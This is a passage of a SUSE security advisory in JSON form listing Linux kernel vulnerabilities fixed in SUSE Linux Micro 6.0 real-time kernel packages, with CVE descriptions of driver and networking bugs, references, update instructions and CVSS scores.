"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: spi-sprd-adi: Fix double free in probe error path\n\nThe driver currently uses spi_alloc_host() to allocate the controller\nbut registers it using devm_spi_register_controller().\n\nIf devm_register_restart_handler() fails, the code jumps to the\nput_ctlr label and calls spi_controller_put(). However, since the\ncontroller was registered via a devm function, the device core will\nautomatically call spi_controller_put() again when the probe fails.\nThis results in a double-free of the spi_controller structure.\n\nFix this by switching to devm_spi_alloc_host() and removing the\nmanual spi_controller_put() call.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23068",
"url": "https://www.suse.com/security/cve/CVE-2026-23068"
},
{
"category": "external",
"summary": "SUSE Bug 1257805 for CVE-2026-23068",
"url": "https://bugzilla.suse.com/1257805"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23068"
},
{
"cve": "CVE-2026-23071",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23071"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nregmap: Fix race condition in hwspinlock irqsave routine\n\nPreviously, the address of the shared member \u0027\u0026map-\u003espinlock_flags\u0027 was\npassed directly to \u0027hwspin_lock_timeout_irqsave\u0027. This creates a race\ncondition where multiple contexts contending for the lock could overwrite\nthe shared flags variable, potentially corrupting the state for the\ncurrent lock owner.\n\nFix this by using a local stack variable \u0027flags\u0027 to store the IRQ state\ntemporarily.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23071",
"url": "https://www.suse.com/security/cve/CVE-2026-23071"
},
{
"category": "external",
"summary": "SUSE Bug 1257706 for CVE-2026-23071",
"url": "https://bugzilla.suse.com/1257706"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23071"
},
{
"cve": "CVE-2026-23073",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23073"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rsi: Fix memory corruption due to not set vif driver data size\n\nThe struct ieee80211_vif contains trailing space for vif driver data,\nwhen struct ieee80211_vif is allocated, the total memory size that is\nallocated is sizeof(struct ieee80211_vif) + size of vif driver data.\nThe size of vif driver data is set by each WiFi driver as needed.\n\nThe RSI911x driver does not set vif driver data size, no trailing space\nfor vif driver data is therefore allocated past struct ieee80211_vif .\nThe RSI911x driver does however use the vif driver data to store its\nvif driver data structure \"struct vif_priv\". An access to vif-\u003edrv_priv\nleads to access out of struct ieee80211_vif bounds and corruption of\nsome memory.\n\nIn case of the failure observed locally, rsi_mac80211_add_interface()\nwould write struct vif_priv *vif_info = (struct vif_priv *)vif-\u003edrv_priv;\nvif_info-\u003evap_id = vap_idx. This write corrupts struct fq_tin member\nstruct list_head new_flows . The flow = list_first_entry(head, struct\nfq_flow, flowchain); in fq_tin_reset() then reports non-NULL bogus\naddress, which when accessed causes a crash.\n\nThe trigger is very simple, boot the machine with init=/bin/sh , mount\ndevtmpfs, sysfs, procfs, and then do \"ip link set wlan0 up\", \"sleep 1\",\n\"ip link set wlan0 down\" and the crash occurs.\n\nFix this by setting the correct size of vif driver data, which is the\nsize of \"struct vif_priv\", so that memory is allocated and the driver\ncan store its driver data in it, instead of corrupting memory around\nit.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23073",
"url": "https://www.suse.com/security/cve/CVE-2026-23073"
},
{
"category": "external",
"summary": "SUSE Bug 1257707 for CVE-2026-23073",
"url": "https://bugzilla.suse.com/1257707"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23073"
},
{
"cve": "CVE-2026-23074",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23074"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: Enforce that teql can only be used as root qdisc\n\nDesign intent of teql is that it is only supposed to be used as root qdisc.\nWe need to check for that constraint.\n\nAlthough not important, I will describe the scenario that unearthed this\nissue for the curious.\n\nGangMin Kim \u003ckm.kim1503@gmail.com\u003e managed to concot a scenario as follows:\n\nROOT qdisc 1:0 (QFQ)\n \u251c\u2500\u2500 class 1:1 (weight=15, lmax=16384) netem with delay 6.4s\n \u2500\u2500 class 1:2 (weight=1, lmax=1514) teql\n\nGangMin sends a packet which is enqueued to 1:1 (netem).\nAny invocation of dequeue by QFQ from this class will not return a packet\nuntil after 6.4s. In the meantime, a second packet is sent and it lands on\n1:2. teql\u0027s enqueue will return success and this will activate class 1:2.\nMain issue is that teql only updates the parent visible qlen (sch-\u003eq.qlen)\nat dequeue. Since QFQ will only call dequeue if peek succeeds (and teql\u0027s\npeek always returns NULL), dequeue will never be called and thus the qlen\nwill remain as 0. With that in mind, when GangMin updates 1:2\u0027s lmax value,\nthe qfq_change_class calls qfq_deact_rm_from_agg. Since the child qdisc\u0027s\nqlen was not incremented, qfq fails to deactivate the class, but still\nfrees its pointers from the aggregate. So when the first packet is\nrescheduled after 6.4 seconds (netem\u0027s delay), a dangling pointer is\naccessed causing GangMin\u0027s causing a UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23074",
"url": "https://www.suse.com/security/cve/CVE-2026-23074"
},
{
"category": "external",
"summary": "SUSE Bug 1257749 for CVE-2026-23074",
"url": "https://bugzilla.suse.com/1257749"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2026-23074"
},
{
"cve": "CVE-2026-23076",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23076"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: ctxfi: Fix potential OOB access in audio mixer handling\n\nIn the audio mixer handling code of ctxfi driver, the conf field is\nused as a kind of loop index, and it\u0027s referred in the index callbacks\n(amixer_index() and sum_index()).\n\nAs spotted recently by fuzzers, the current code causes OOB access at\nthose functions.\n| UBSAN: array-index-out-of-bounds in /build/reproducible-path/linux-6.17.8/sound/pci/ctxfi/ctamixer.c:347:48\n| index 8 is out of range for type \u0027unsigned char [8]\u0027\n\nAfter the analysis, the cause was found to be the lack of the proper\n(re-)initialization of conj field.\n\nThis patch addresses those OOB accesses by adding the proper\ninitializations of the loop indices.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23076",
"url": "https://www.suse.com/security/cve/CVE-2026-23076"
},
{
"category": "external",
"summary": "SUSE Bug 1257788 for CVE-2026-23076",
"url": "https://bugzilla.suse.com/1257788"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23076"
},
{
"cve": "CVE-2026-23078",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23078"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: scarlett2: Fix buffer overflow in config retrieval\n\nThe scarlett2_usb_get_config() function has a logic error in the\nendianness conversion code that can cause buffer overflows when\ncount \u003e 1.\n\nThe code checks `if (size == 2)` where `size` is the total buffer size in\nbytes, then loops `count` times treating each element as u16 (2 bytes).\nThis causes the loop to access `count * 2` bytes when the buffer only\nhas `size` bytes allocated.\n\nFix by checking the element size (config_item-\u003esize) instead of the\ntotal buffer size. This ensures the endianness conversion matches the\nactual element type.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23078",
"url": "https://www.suse.com/security/cve/CVE-2026-23078"
},
{
"category": "external",
"summary": "SUSE Bug 1257789 for CVE-2026-23078",
"url": "https://bugzilla.suse.com/1257789"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:P/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23078"
},
{
"cve": "CVE-2026-23080",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23080"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncan: mcba_usb: mcba_usb_read_bulk_callback(): fix URB memory leak\n\nFix similar memory leak as in commit 7352e1d5932a (\"can: gs_usb:\ngs_usb_receive_bulk_callback(): fix URB memory leak\").\n\nIn mcba_usb_probe() -\u003e mcba_usb_start(), the URBs for USB-in transfers are\nallocated, added to the priv-\u003erx_submitted anchor and submitted. In the\ncomplete callback mcba_usb_read_bulk_callback(), the URBs are processed and\nresubmitted. In mcba_usb_close() -\u003e mcba_urb_unlink() the URBs are freed by\ncalling usb_kill_anchored_urbs(\u0026priv-\u003erx_submitted).\n\nHowever, this does not take into account that the USB framework unanchors\nthe URB before the complete function is called. This means that once an\nin-URB has been completed, it is no longer anchored and is ultimately not\nreleased in usb_kill_anchored_urbs().\n\nFix the memory leak by anchoring the URB in the\nmcba_usb_read_bulk_callback()to the priv-\u003erx_submitted anchor.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23080",
"url": "https://www.suse.com/security/cve/CVE-2026-23080"
},
{
"category": "external",
"summary": "SUSE Bug 1257714 for CVE-2026-23080",
"url": "https://bugzilla.suse.com/1257714"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23080"
},
{
"cve": "CVE-2026-23082",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23082"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncan: gs_usb: gs_usb_receive_bulk_callback(): unanchor URL on usb_submit_urb() error\n\nIn commit 7352e1d5932a (\"can: gs_usb: gs_usb_receive_bulk_callback(): fix\nURB memory leak\"), the URB was re-anchored before usb_submit_urb() in\ngs_usb_receive_bulk_callback() to prevent a leak of this URB during\ncleanup.\n\nHowever, this patch did not take into account that usb_submit_urb() could\nfail. The URB remains anchored and\nusb_kill_anchored_urbs(\u0026parent-\u003erx_submitted) in gs_can_close() loops\ninfinitely since the anchor list never becomes empty.\n\nTo fix the bug, unanchor the URB when an usb_submit_urb() error occurs,\nalso print an info message.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23082",
"url": "https://www.suse.com/security/cve/CVE-2026-23082"
},
{
"category": "external",
"summary": "SUSE Bug 1257715 for CVE-2026-23082",
"url": "https://bugzilla.suse.com/1257715"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23082"
},
{
"cve": "CVE-2026-23083",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23083"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfou: Don\u0027t allow 0 for FOU_ATTR_IPPROTO.\n\nfou_udp_recv() has the same problem mentioned in the previous\npatch.\n\nIf FOU_ATTR_IPPROTO is set to 0, skb is not freed by\nfou_udp_recv() nor \"resubmit\"-ted in ip_protocol_deliver_rcu().\n\nLet\u0027s forbid 0 for FOU_ATTR_IPPROTO.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23083",
"url": "https://www.suse.com/security/cve/CVE-2026-23083"
},
{
"category": "external",
"summary": "SUSE Bug 1257745 for CVE-2026-23083",
"url": "https://bugzilla.suse.com/1257745"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2026-23083"
},
{
"cve": "CVE-2026-23084",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23084"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbe2net: Fix NULL pointer dereference in be_cmd_get_mac_from_list\n\nWhen the parameter pmac_id_valid argument of be_cmd_get_mac_from_list() is\nset to false, the driver may request the PMAC_ID from the firmware of the\nnetwork card, and this function will store that PMAC_ID at the provided\naddress pmac_id. This is the contract of this function.\n\nHowever, there is a location within the driver where both\npmac_id_valid == false and pmac_id == NULL are being passed. This could\nresult in dereferencing a NULL pointer.\n\nTo resolve this issue, it is necessary to pass the address of a stub\nvariable to the function.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23084",
"url": "https://www.suse.com/security/cve/CVE-2026-23084"
},
{
"category": "external",
"summary": "SUSE Bug 1257830 for CVE-2026-23084",
"url": "https://bugzilla.suse.com/1257830"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23084"
},
{
"cve": "CVE-2026-23085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nirqchip/gic-v3-its: Avoid truncating memory addresses\n\nOn 32-bit machines with CONFIG_ARM_LPAE, it is possible for lowmem\nallocations to be backed by addresses physical memory above the 32-bit\naddress limit, as found while experimenting with larger VMSPLIT\nconfigurations.\n\nThis caused the qemu virt model to crash in the GICv3 driver, which\nallocates the \u0027itt\u0027 object using GFP_KERNEL. Since all memory below\nthe 4GB physical address limit is in ZONE_DMA in this configuration,\nkmalloc() defaults to higher addresses for ZONE_NORMAL, and the\nITS driver stores the physical address in a 32-bit \u0027unsigned long\u0027\nvariable.\n\nChange the itt_addr variable to the correct phys_addr_t type instead,\nalong with all other variables in this driver that hold a physical\naddress.\n\nThe gicv5 driver correctly uses u64 variables, while all other irqchip\ndrivers don\u0027t call virt_to_phys or similar interfaces. It\u0027s expected that\nother device drivers have similar issues, but fixing this one is\nsufficient for booting a virtio based guest.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23085",
"url": "https://www.suse.com/security/cve/CVE-2026-23085"
},
{
"category": "external",
"summary": "SUSE Bug 1257758 for CVE-2026-23085",
"url": "https://bugzilla.suse.com/1257758"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
